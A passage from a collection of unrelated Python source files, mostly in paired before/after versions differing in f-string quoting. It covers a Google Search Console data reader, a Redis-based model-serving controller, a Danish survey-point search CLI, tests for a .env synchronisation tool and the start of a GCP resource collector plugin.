dimension_dataset in self._data_set[0].items(): partition_dataset = self._partition_dataset( partition=partition, dataset=dimension_dataset ) for partition_name, partition_data in partition_dataset.items(): write_file_to_s3( bucket=bucket, key=f"{path}/{partition_name}_{dimension}.{fmt}", data=partition_data, )
""" Google Search Console API """ import logging import pickle from socket import timeout from googleapiclient.discovery import build from googleapiclient.errors import HttpError from oauth2client.client import OAuth2WebServerFlow from turbo_stream import ReaderInterface, write_file, write_file_to_s3 from turbo_stream.utils.date_handlers import date_range from turbo_stream.utils.request_handlers import request_handler, retry_handler logging.basicConfig( format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s", level=logging.INFO ) class GoogleSearchConsoleReader(ReaderInterface): """ Google Search Console API Reader """ def __init__(self, configuration: dict, credentials: (dict, str), **kwargs): super().__init__(configuration, credentials) self.scopes = kwargs.get( "scopes", ( "https://www.googleapis.com/auth/webmasters.readonly", "https://www.googleapis.com/auth/webmasters", ), ) self.discovery_uri = kwargs.get( "discovery_uri", ("https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest"), ) self.oauth_scope = kwargs.get( "oath_scope", "https://www.googleapis.com/auth/webmasters.readonly" ) self.redirect_uri = kwargs.get("redirect_uri", "urn:ietf:wg:oauth:2.0:oob") def generate_authentication( self, auth_file_location="gsc_credentials.pickle" ) -> None: """ A user friendly method to generate a .pickle file for future authentication. For the first time, you would need to log in with your web browser based on this web authentication flow. After that, it will save your credentials in a pickle file. Every subsequent time you run the script, it will use the “pickled” credentials stored in credentials.pickle to build the connection to Search Console. """ flow = OAuth2WebServerFlow( self._credentials["installed"].get("client_id"), self._credentials["installed"].get("client_secret"), self.oauth_scope, self.redirect_uri, ) authorize_url = flow.step1_get_authorize_url() logging.info(f"Go to the following link in your browser: {authorize_url}") code = input("Enter verification code: ").strip() credentials = flow.step2_exchange(code) pickle.dump(credentials, open(auth_file_location, "wb")) def _get_service(self) -> build: """ Makes use of the .pickle cred file to establish a webmaster connection. """ with open(self._credentials, "rb") as _file: credentials = pickle.load(_file) return build( "searchconsole", "v1", credentials=credentials, cache_discovery=False ) @request_handler(wait=1, backoff_factor=0.5) @retry_handler( exceptions=(timeout, HttpError), total_tries=5, initial_wait=60, backoff_factor=5, ) def _query_handler(self, service, request, site_url): """ Run the API request that consumes a request payload and site url. This separates the request with the request handler from the rest of the logic. """ return service.searchanalytics().query(siteUrl=site_url, body=request).execute() def run_query(self): """ Consumes a .yaml config file and loops through the date and url to return relevant data from GSC API. """ service: build = self._get_service() start_date: str = self._configuration.get("start_date") end_date: str = self._configuration.get("end_date") dimensions: list = self._configuration.get("dimensions") logging.info( f"Gathering data between given dates {start_date} and {end_date}. " f"Querying for Site Url: {self._configuration.get('site_url')}." ) dimension_data_set = {} # split request by date to reduce 504 errors for dimension in dimensions: for date in date_range(start_date=start_date, end_date=end_date): logging.info(f"Querying at date: {date} for dimension: {dimension}.") # run until none is returned or there is no more data in rows row_index = 0 while True: dim_query_set = list(dict.fromkeys(["date", dimension])) response = self._query_handler( service=service, request={ "startDate": date, "endDate": date, "dimensions": dim_query_set, "metrics": self._configuration.get("metrics"), "type": self._configuration.get("type"), "rowLimit": self._configuration.get("row_limit", 25000), "startRow": row_index * self._configuration.get("row_limit", 25000), "aggregationType": self._configuration.get( "aggregation_type", "auto" ), "dimensionFilterGroups": self._configuration.get( "dimension_filter_groups", [] ), "dataState": self._configuration.get("data_state", "final"), }, site_url=self._configuration.get("site_url"), ) if response is None: logging.info("Response is None, exiting process...") break if "rows" not in response: logging.info("No more data in given row, moving on....") break # added additional data that the api does not provide for row in response["rows"]: dataset = { "site_url": self._configuration.get("site_url"), "search_type": self._configuration.get("search_type"), } # get dimension data keys and values dataset.update( dict( zip( dim_query_set, row.get("keys", []), ) ) ) # get metrics data for metric in self._configuration.get("metrics", []): dataset[metric] = row.get(metric) if dimension not in dimension_data_set: dimension_data_set[dimension] = [] dimension_data_set[dimension].append(dataset) row_index += 1 self._append_data_set(dimension_data_set) logging.info(f"{self.__class__.__name__} process complete!") return self._data_set def write_date_to_local(self, file_location): """ GSC returns queries for each dimension respectively. The response data is response_dataset = { "date": ["dimension response data"], "page": ["dimension response data"], "query": ["dimension response data"] } So each dimension will be written as its own dataset to local. :param file_location: Local file location. """ for dimension, dimension_dataset in self._data_set[0].items(): file_split = file_location.split(".") filepath = f"{file_split[0]}_{dimension}.{file_split[-1]}" logging.info(f"Writing {dimension} data to local path: {filepath}.") write_file(data=dimension_dataset, file_location=filepath) def write_partition_data_to_s3( self, bucket: str, path: str, partition: str, fmt="json" ): """ Writes a file to s3, partitioned by a given field in the dataset. Json objects will be serialised before writing. This works best with date fields where the use-case would be to reduce duplicates stored in s3. Specifying the file type in the name will serialise the data.Supported formats are Json, CSV, Parquet and Text. :param bucket: The bucket to write to in s3. :param path: The path in the bucket where the partition file will be written. :param partition: The field name in the dataset what will become the partition. :param fmt: The format to write in. :return: The partitioned dataset object """ for dimension, dimension_dataset in self._data_set[0].items(): partition_dataset = self._partition_dataset( partition=partition, dataset=dimension_dataset ) for partition_name, partition_data in partition_dataset.items(): write_file_to_s3( bucket=bucket, key=f"{path}/{partition_name}_{dimension}.{fmt}", data=partition_data, )
import base64 import subprocess import json from pathlib import Path import random import requests import redis from redis import Redis import time import threading import collections from threading import Lock from threading import Event from queue import Queue # Mine import exceptions import abstractions import logging import os import common class LocalController: def __init__(self, redis_server='redis-server', redis_port=6379): # Set Up Redis database connection self.db = Redis(host=redis_server, port=redis_port) try: self.db.ping() except redis.exceptions.ConnectionError as e: print(f"Error connecting to Redis server @ {redis_server}. Is it started?") print(e) exit(8) # Get basic information from Redis ## Note: might not be available self.model_names = [w.decode() for w in self.db.smembers(f"{common.MODEL_NAME_KEY}")] # Set up structures self.models_by_name = {} # Set up lists of models and workers self.workers_by_url = {} self.model_placements = common.ModelPlacements() ## Set up locks for models and workers self.workers_lock = threading.RLock() self.model_lock = threading.RLock() # Events for when models are available # TODO: purge this half-assed approach self.model_available_event = { model_name : Event() for model_name in self.model_names } # Subscribe to future updates to models and workers pubsub = self.db.pubsub() pubsub.subscribe(**{f'{common.KEYSPACE_PREFIX}{common.WORKER_URL_KEY}': self.updateWorkerList}) pubsub.psubscribe(**{f'{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}*': self.updateModelPlacement}) # Note: There is an option sleep_time argument to run_in_thread that I'm not totally sure what it does self.subThread = pubsub.run_in_thread() self.metrics = common.Metrics(self.db, common.MODEL_STAT_PREFIX, ["requests_submitted", "requests_completed", "open_requests"], ["requests_submitted"]) print("Controller Initialized.") ###################### ## Worker Functions ## ###################### def addWorker(self, worker_url): logging.info("local_controller: addWorker start") logging.info(f"Adding worker: {worker_url}") worker_url = common.fixWorkerURL(worker_url) if worker_url in self.workers_by_url.keys() and self.workers_by_url[worker_url] is not None: logging.warn(f"Already added worker @ '{worker_url}'") return new_worker = abstractions.WorkerAbstraction(worker_url) # TODO: Add error checking for the new worker. Check to see if it is active for instance # TODO: Get list of models in the repo on the new worker self.workers_by_url[worker_url] = new_worker logging.info("local_controller: addWorker end") def delWorker(self, worker_url): logging.debug("delWorker start") logging.debug(f"Deling worker: {worker_url}") #self.workers_by_url[worker_url].removeWorker() del self.workers_by_url[worker_url] ###################### ##################### ## Model Functions ## ##################### def getModelByName(self, model_name): try: model = self.models_by_name[model_name] except KeyError: model = abstractions.ModelAbstraction(model_name) self.models_by_name[model_name] = model return model def loadModelOntoWorker(self, model_name, worker_url): logging.info("loadModelOntoWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].loadModel(model): self.model_placements.addModelToWorker(worker_url, model.model_name) else: logging.error(f"Failed to load model '{model.model_name}' to worker @ {worker_url}") def unloadModelFromWorker(self, model_name, worker_url): logging.info("unloadModelFromWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].unloadModel(model): self.model_placements.removeModelFromWorker(worker_url, model.model_name) else: logging.error(f"Failed to unload model '{model.model_name}' to worker @ {worker_url}") ##################### ######################### ## Statistic Functions ## def recordRequestEntry(self, model_requested): self.metrics.incrementMetricBy("requests_submitted", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, +1) def recordRequestExit(self, model_requested): self.metrics.incrementMetricBy("requests_completed", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, -1) ######################### ######################### ## Inventory Functions ## ######################### def updateWorkerList(self, message=None): logging.debug("updateWorkerList start") orig_message = message message = orig_message["data"].decode() if message not in ["sadd", "srem"]: logging.error(f"Unknown message received: {message}") logging.error(f"Full message: {orig_message}") return logging.debug("Acquiring workers_lock") try: with self.workers_lock: redis_worker_urls = list(map( (lambda b: common.fixWorkerURL(b.decode())), self.db.smembers(f'{common.WORKER_URL_KEY}'))) if message == "sadd" or message is None: # Workers were added worker_urls_add = list(set(redis_worker_urls) - set(self.workers_by_url.keys())) for worker_url in worker_urls_add: self.addWorker(worker_url) elif message == "srem" or message == "del": # Workers were removed worker_urls_del = list(set(self.workers_by_url.keys()) - set(redis_worker_urls)) for worker_url in worker_urls_del: self.delWorker(worker_url) finally: logging.debug("Releasing workers_lock") def updateModelPlacement(self, message): logging.debug("updateModelPlacement start") orig_message = message message = orig_message["data"].decode() channel = orig_message["channel"].decode() if message not in ["sadd", "srem"]: logging.warn(f"Unknown message received: {message}") logging.warn(f"Full message: {orig_message}") return model_name = channel.replace(f"{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}","") logging.info(f"Update for model: {message} {model_name}") try: redis_model_placements = list(map( (lambda b: common.fixWorkerURL(b.decode())), self.db.smembers(f"{common.MODEL_PLACEMENT_PREFIX}{model_name}"))) current_placements = self.model_placements.getWorkersFromModel(model_name) logging.info(f"redis_model_placements: {redis_model_placements}") logging.info(f"current_placements: {current_placements}") logging.debug("Acquiring model lock") with self.model_lock: if message == "sadd": placements_to_add = list(set(redis_model_placements) - set(current_placements)) for worker_url in placements_to_add: logging.info(f"Adding {model_name} to {worker_url}") self.loadModelOntoWorker(model_name, worker_url) elif message == "srem": placements_to_del = list(set(current_placements) - set(redis_model_placements)) for worker_url in placements_to_del: logging.debug(f"Del'ing {model_name} from {worker_url}") self.unloadModelFromWorker(model_name, worker_url) finally: logging.debug("Releasing model lock") ######################### @common.timing def infer(self, inference_request): logging.info(f"infer({inference_request.model_name})") self.recordRequestEntry(inference_request.model_name) logging.info(f"inference_request: {inference_request}") model = self.getModelByName(inference_request.model_name) accepted_by_worker = False while not accepted_by_worker: while len(model.placements) == 0: self.requestModelPlacement(inference_request) if not model.is_available.wait(common.PLACEMENT_POLL_INTERVAL): logging.warning(f"Waiting on placement for {model}") if len(model.placements) > 0: worker = random.choice(list(model.placements)) accepted_by_worker = worker.infer(inference_request) else: logging.warning("Worker picked already reassigned, requests are coming in too fast?") if not inference_request.complete.wait(common.TIMEOUT_IN_SECONDS): raise exceptions.InferenceFailedException("Inference Failed to respond") logging.info(f"inference request after inference: {inference_request}") self.recordRequestExit(inference_request.model_name) logging.info(f"response: {inference_request}") #.getResponse()}") return inference_request.getResponse() @common.gather_info def requestModelPlacement(self, inference_request): logging.info(f"requestModelPlacement({inference_request.model_name})") # In case oracle is being used self.db.set(f"latest_request_id", f"{inference_request.id}") # Request model placement results = self.db.sadd(f"{common.PLACEMENT_REQUEST_KEY}", f"{inference_request.model_name}") if results >= 1: # If this is the first time this model has been requested inference_request.markModelMiss() if __name__ == '__main__': common.getLogger(f"{os.path.basename(__file__).replace(".py", "")}") local_controller = LocalController() while True: time.sleep(0.001)
import base64 import subprocess import json from pathlib import Path import random import requests import redis from redis import Redis import time import threading import collections from threading import Lock from threading import Event from queue import Queue # Mine import exceptions import abstractions import logging import os import common class LocalController: def __init__(self, redis_server='redis-server', redis_port=6379): # Set Up Redis database connection self.db = Redis(host=redis_server, port=redis_port) try: self.db.ping() except redis.exceptions.ConnectionError as e: print(f"Error connecting to Redis server @ {redis_server}. Is it started?") print(e) exit(8) # Get basic information from Redis ## Note: might not be available self.model_names = [w.decode() for w in self.db.smembers(f"{common.MODEL_NAME_KEY}")] # Set up structures self.models_by_name = {} # Set up lists of models and workers self.workers_by_url = {} self.model_placements = common.ModelPlacements() ## Set up locks for models and workers self.workers_lock = threading.RLock() self.model_lock = threading.RLock() # Events for when models are available # TODO: purge this half-assed approach self.model_available_event = { model_name : Event() for model_name in self.model_names } # Subscribe to future updates to models and workers pubsub = self.db.pubsub() pubsub.subscribe(**{f'{common.KEYSPACE_PREFIX}{common.WORKER_URL_KEY}': self.updateWorkerList}) pubsub.psubscribe(**{f'{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}*': self.updateModelPlacement}) # Note: There is an option sleep_time argument to run_in_thread that I'm not totally sure what it does self.subThread = pubsub.run_in_thread() self.metrics = common.Metrics(self.db, common.MODEL_STAT_PREFIX, ["requests_submitted", "requests_completed", "open_requests"], ["requests_submitted"]) print("Controller Initialized.") ###################### ## Worker Functions ## ###################### def addWorker(self, worker_url): logging.info("local_controller: addWorker start") logging.info(f"Adding worker: {worker_url}") worker_url = common.fixWorkerURL(worker_url) if worker_url in self.workers_by_url.keys() and self.workers_by_url[worker_url] is not None: logging.warn(f"Already added worker @ '{worker_url}'") return new_worker = abstractions.WorkerAbstraction(worker_url) # TODO: Add error checking for the new worker. Check to see if it is active for instance # TODO: Get list of models in the repo on the new worker self.workers_by_url[worker_url] = new_worker logging.info("local_controller: addWorker end") def delWorker(self, worker_url): logging.debug("delWorker start") logging.debug(f"Deling worker: {worker_url}") #self.workers_by_url[worker_url].removeWorker() del self.workers_by_url[worker_url] ###################### ##################### ## Model Functions ## ##################### def getModelByName(self, model_name): try: model = self.models_by_name[model_name] except KeyError: model = abstractions.ModelAbstraction(model_name) self.models_by_name[model_name] = model return model def loadModelOntoWorker(self, model_name, worker_url): logging.info("loadModelOntoWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].loadModel(model): self.model_placements.addModelToWorker(worker_url, model.model_name) else: logging.error(f"Failed to load model '{model.model_name}' to worker @ {worker_url}") def unloadModelFromWorker(self, model_name, worker_url): logging.info("unloadModelFromWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].unloadModel(model): self.model_placements.removeModelFromWorker(worker_url, model.model_name) else: logging.error(f"Failed to unload model '{model.model_name}' to worker @ {worker_url}") ##################### ######################### ## Statistic Functions ## def recordRequestEntry(self, model_requested): self.metrics.incrementMetricBy("requests_submitted", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, +1) def recordRequestExit(self, model_requested): self.metrics.incrementMetricBy("requests_completed", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, -1) ######################### ######################### ## Inventory Functions ## ######################### def updateWorkerList(self, message=None): logging.debug("updateWorkerList start") orig_message = message message = orig_message["data"].decode() if message not in ["sadd", "srem"]: logging.error(f"Unknown message received: {message}") logging.error(f"Full message: {orig_message}") return logging.debug("Acquiring workers_lock") try: with self.workers_lock: redis_worker_urls = list(map( (lambda b: common.fixWorkerURL(b.decode())), self.db.smembers(f'{common.WORKER_URL_KEY}'))) if message == "sadd" or message is None: # Workers were added worker_urls_add = list(set(redis_worker_urls) - set(self.workers_by_url.keys())) for worker_url in worker_urls_add: self.addWorker(worker_url) elif message == "srem" or message == "del": # Workers were removed worker_urls_del = list(set(self.workers_by_url.keys()) - set(redis_worker_urls)) for worker_url in worker_urls_del: self.delWorker(worker_url) finally: logging.debug("Releasing workers_lock") def updateModelPlacement(self, message): logging.debug("updateModelPlacement start") orig_message = message message = orig_message["data"].decode() channel = orig_message["channel"].decode() if message not in ["sadd", "srem"]: logging.warn(f"Unknown message received: {message}") logging.warn(f"Full message: {orig_message}") return model_name = channel.replace(f"{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}","") logging.info(f"Update for model: {message} {model_name}") try: redis_model_placements = list(map( (lambda b: common.fixWorkerURL(b.decode())), self.db.smembers(f"{common.MODEL_PLACEMENT_PREFIX}{model_name}"))) current_placements = self.model_placements.getWorkersFromModel(model_name) logging.info(f"redis_model_placements: {redis_model_placements}") logging.info(f"current_placements: {current_placements}") logging.debug("Acquiring model lock") with self.model_lock: if message == "sadd": placements_to_add = list(set(redis_model_placements) - set(current_placements)) for worker_url in placements_to_add: logging.info(f"Adding {model_name} to {worker_url}") self.loadModelOntoWorker(model_name, worker_url) elif message == "srem": placements_to_del = list(set(current_placements) - set(redis_model_placements)) for worker_url in placements_to_del: logging.debug(f"Del'ing {model_name} from {worker_url}") self.unloadModelFromWorker(model_name, worker_url) finally: logging.debug("Releasing model lock") ######################### @common.timing def infer(self, inference_request): logging.info(f"infer({inference_request.model_name})") self.recordRequestEntry(inference_request.model_name) logging.info(f"inference_request: {inference_request}") model = self.getModelByName(inference_request.model_name) accepted_by_worker = False while not accepted_by_worker: while len(model.placements) == 0: self.requestModelPlacement(inference_request) if not model.is_available.wait(common.PLACEMENT_POLL_INTERVAL): logging.warning(f"Waiting on placement for {model}") if len(model.placements) > 0: worker = random.choice(list(model.placements)) accepted_by_worker = worker.infer(inference_request) else: logging.warning("Worker picked already reassigned, requests are coming in too fast?") if not inference_request.complete.wait(common.TIMEOUT_IN_SECONDS): raise exceptions.InferenceFailedException("Inference Failed to respond") logging.info(f"inference request after inference: {inference_request}") self.recordRequestExit(inference_request.model_name) logging.info(f"response: {inference_request}") #.getResponse()}") return inference_request.getResponse() @common.gather_info def requestModelPlacement(self, inference_request): logging.info(f"requestModelPlacement({inference_request.model_name})") # In case oracle is being used self.db.set(f"latest_request_id", f"{inference_request.id}") # Request model placement results = self.db.sadd(f"{common.PLACEMENT_REQUEST_KEY}", f"{inference_request.model_name}") if results >= 1: # If this is the first time this model has been requested inference_request.markModelMiss() if __name__ == '__main__': common.getLogger(f"{os.path.basename(__file__).replace('.py', '')}") local_controller = LocalController() while True: time.sleep(0.001)
import re import sys import click from sqlalchemy.orm.exc import NoResultFound import fire.cli from fire.cli.utils import klargør_ident_til_søgning from . import søg @søg.command() @fire.cli.default_options() @click.argument("ident") @click.option( "-n", "--antal", default=20, type=int, help="Begræns antallet af fundne søgeresultater", ) def punkt(ident: str, antal: int, **kwargs): """ Søg efter et punkt ud fra dets ident Søgeudtryk kan præciseres med wildcards givet ved %. Hvis ingen wildcards angives søges automatisk efter "%IDENT%". Der skælnes ikke mellem små og store bogstaver. Antallet af søgeresultater begrænses som standard til 20. """ ident = klargør_ident_til_søgning(ident) if "%" not in ident: ident = f"%{ident}%" ident_pattern = ident.replace("%", ".*") try: punkter = fire.cli.firedb.soeg_punkter(ident, antal) except NoResultFound: fire.cli.print( f"Fejl: Kunne ikke finde {ident.replace("%", "")}.", fg="red", err=True ) sys.exit(1) for punkt in punkter: for ident in punkt.identer: if re.match(ident_pattern, ident): fire.cli.print(f"{ident:20}", bold=True, fg="green", nl=False) else: fire.cli.print(f"{ident:20}", nl=False) fire.cli.print(nl=True)
import re import sys import click from sqlalchemy.orm.exc import NoResultFound import fire.cli from fire.cli.utils import klargør_ident_til_søgning from . import søg @søg.command() @fire.cli.default_options() @click.argument("ident") @click.option( "-n", "--antal", default=20, type=int, help="Begræns antallet af fundne søgeresultater", ) def punkt(ident: str, antal: int, **kwargs): """ Søg efter et punkt ud fra dets ident Søgeudtryk kan præciseres med wildcards givet ved %. Hvis ingen wildcards angives søges automatisk efter "%IDENT%". Der skælnes ikke mellem små og store bogstaver. Antallet af søgeresultater begrænses som standard til 20. """ ident = klargør_ident_til_søgning(ident) if "%" not in ident: ident = f"%{ident}%" ident_pattern = ident.replace("%", ".*") try: punkter = fire.cli.firedb.soeg_punkter(ident, antal) except NoResultFound: fire.cli.print( f"Fejl: Kunne ikke finde {ident.replace('%', '')}.", fg="red", err=True ) sys.exit(1) for punkt in punkter: for ident in punkt.identer: if re.match(ident_pattern, ident): fire.cli.print(f"{ident:20}", bold=True, fg="green", nl=False) else: fire.cli.print(f"{ident:20}", nl=False) fire.cli.print(nl=True)
import glob import os import emoji import pytest from click.testing import CliRunner from py_sync_dotenv.cli import formatting_engine, main test_env = """ PRODUCTION=1 DEBUG=0 SECRET_KEY=iu0^cv$mghjfa_vp8vk)e(c_5^cfo7staccjs4+!f#=1a_22-h2 DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1] """ @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): s_source = source.split(" ")[1] if source else ".env" with open(f"{s_source}", "w") as f: f.write(test_env) if dev_env: with open(f"{dev_env.split(" ")[1]}", "a") as f: pass if dev_envs: if not os.path.exists(dev_envs.split(" ")[1]): os.makedirs(dev_envs.split(" ")[1]) with open(f"{dev_envs.split(" ")[1]}/.env.dev", "a") as f: pass with open(f"{dev_envs.split(" ")[1]}/.env1.dev", "a") as f: pass args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert not result.exception assert result.output == ( f"{emoji.emojize(":loudspeaker: Synchronizing your .env file(s) :loudspeaker:")}" + f"\n{emoji.emojize(":fire: Synchronizing Complete :fire:", use_aliases=True)}\n" ) if dev_env: with open(f"{dev_env.split(" ")[1]}", "r") as f: output = f.read() if just_variables: assert output == "\n".join(formatting_engine(test_env.split("\n"))) else: assert output == test_env if dev_envs: for filename in glob.glob( os.path.join(dev_envs.split(" ")[1], ".env*"), recursive=False ): with open(f"{filename}", "r") as f: output = f.read() if just_variables: assert output == "\n".join( formatting_engine(test_env.split("\n")) ) else: assert output == test_env @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync_invalid_path(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_source_file(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-s .env") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_dev_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ds dev_envs/") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_prod_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ps prod_envs/") assert result.exception assert result.exit_code == 2
import glob import os import emoji import pytest from click.testing import CliRunner from py_sync_dotenv.cli import formatting_engine, main test_env = """ PRODUCTION=1 DEBUG=0 SECRET_KEY=iu0^cv$mghjfa_vp8vk)e(c_5^cfo7staccjs4+!f#=1a_22-h2 DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1] """ @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): s_source = source.split(" ")[1] if source else ".env" with open(f"{s_source}", "w") as f: f.write(test_env) if dev_env: with open(f"{dev_env.split(' ')[1]}", "a") as f: pass if dev_envs: if not os.path.exists(dev_envs.split(" ")[1]): os.makedirs(dev_envs.split(" ")[1]) with open(f"{dev_envs.split(' ')[1]}/.env.dev", "a") as f: pass with open(f"{dev_envs.split(' ')[1]}/.env1.dev", "a") as f: pass args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert not result.exception assert result.output == ( f"{emoji.emojize(':loudspeaker: Synchronizing your .env file(s) :loudspeaker:')}" + f"\n{emoji.emojize(':fire: Synchronizing Complete :fire:', use_aliases=True)}\n" ) if dev_env: with open(f"{dev_env.split(' ')[1]}", "r") as f: output = f.read() if just_variables: assert output == "\n".join(formatting_engine(test_env.split("\n"))) else: assert output == test_env if dev_envs: for filename in glob.glob( os.path.join(dev_envs.split(" ")[1], ".env*"), recursive=False ): with open(f"{filename}", "r") as f: output = f.read() if just_variables: assert output == "\n".join( formatting_engine(test_env.split("\n")) ) else: assert output == test_env @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync_invalid_path(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_source_file(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-s .env") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_dev_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ds dev_envs/") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_prod_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ps prod_envs/") assert result.exception assert result.exit_code == 2
import cklib.logging import socket from pprint import pformat from retrying import retry from typing import Callable, List, Dict, Type, Union from cklib.baseresources import BaseResource from cklib.graph import Graph from cklib.args import ArgumentParser from cklib.utils import except_log_and_pass from prometheus_client import Summary from .resources import ( GCPProject, GCPQuota, GCPRegion, GCPZone, GCPDiskType, GCPDisk, GCPInstance, GCPMachineType, GCPNetwork, GCPSubnetwork, GCPTargetVPNGateway, GCPVPNGateway, GCPVPNTunnel, GCPRouter, GCPRoute, GCPSecurityPolicy, GCPSnapshot, GCPSSLCertificate, GCPNetworkEndpointGroup, GCPGlobalNetworkEndpointGroup, GCPInstanceGroup, GCPInstanceGroupManager, GCPAutoscaler, GCPHealthCheck, GCPHTTPHealthCheck, GCPHTTPSHealthCheck, GCPUrlMap, GCPTargetPool, GCPTargetHttpProxy, GCPTargetHttpsProxy, GCPTargetSslProxy, GCPTargetTcpProxy, GCPTargetGrpcProxy, GCPTargetInstance, GCPBackendService, GCPForwardingRule, GCPGlobalForwardingRule, GCPBucket, GCPDatabase, GCPService, GCPServiceSKU, GCPInstanceTemplate, ) from .utils import ( Credentials, gcp_client, gcp_resource, paginate, iso2datetime, get_result_data, common_resource_kwargs, retry_on_error, ) log = cklib.logging.getLogger("cloudkeeper." + __name__) metrics_collect_regions = Summary( "cloudkeeper_plugin_gcp_collect_regions_seconds", "Time it took the collect_regions() method", ) metrics_collect_zones = Summary( "cloudkeeper_plugin_gcp_collect_zones_seconds", "Time it took the collect_zones() method", ) metrics_collect_disks = Summary( "cloudkeeper_plugin_gcp_collect_disks_seconds", "Time it took the collect_disks() method", ) metrics_collect_instances = Summary( "cloudkeeper_plugin_gcp_collect_instances_seconds", "Time it took the collect_instances() method", ) metrics_collect_disk_types = Summary( "cloudkeeper_plugin_gcp_collect_disk_types_seconds", "Time it took the collect_disk_types() method", ) metrics_collect_networks = Summary( "cloudkeeper_plugin_gcp_collect_networks_seconds", "Time it took the collect_networks() method", ) metrics_collect_subnetworks = Summary( "cloudkeeper_plugin_gcp_collect_subnetworks_seconds", "Time it took the collect_subnetworks() method", ) metrics_collect_vpn_tunnels = Summary( "cloudkeeper_plugin_gcp_collect_vpn_tunnels_seconds", "Time it took the collect_vpn_tunnels() method", ) metrics_collect_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_vpn_gateways_seconds", "Time it took the collect_vpn_gateways() method", ) metrics_collect_target_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_target_vpn_gateways_seconds", "Time it took the collect_target_vpn_gateways() method", ) metrics_collect_routers = Summary( "cloudkeeper_plugin_gcp_collect_routers_seconds", "Time it took the collect_routers() method", ) metrics_collect_routes = Summary( "cloudkeeper_plugin_gcp_collect_routes_seconds", "Time it took the collect_routes() method", ) metrics_collect_security_policies = Summary( "cloudkeeper_plugin_gcp_collect_security_policies_seconds", "Time it took the collect_security_policies() method", ) metrics_collect_snapshots = Summary( "cloudkeeper_plugin_gcp_collect_snapshots_seconds", "Time it took the collect_snapshots() method", ) metrics_collect_ssl_certificates = Summary( "cloudkeeper_plugin_gcp_collect_ssl_certificates_seconds", "Time it took the collect_ssl_certificates() method", ) metrics_collect_machine_types = Summary( "cloudkeeper_plugin_gcp_collect_machine_types_seconds", "Time it took the collect_machine_types() method", ) metrics_collect_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_network_endpoint_groups_seconds", "Time it took the collect_network_endpoint_groups() method", ) metrics_collect_global_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_global_network_endpoint_groups_seconds", "Time it took the collect_global_network_endpoint_groups() method", ) metrics_collect_instance_groups = Summary( "cloudkeeper_plugin_gcp_collect_instance_groups_seconds", "Time it took the collect_instance_groups() method", ) metrics_collect_instance_group_managers = Summary( "cloudkeeper_plugin_gcp_collect_instance_group_managers_seconds", "Time it took the collect_instance_group_managers() method", ) metrics_collect_autoscalers = Summary( 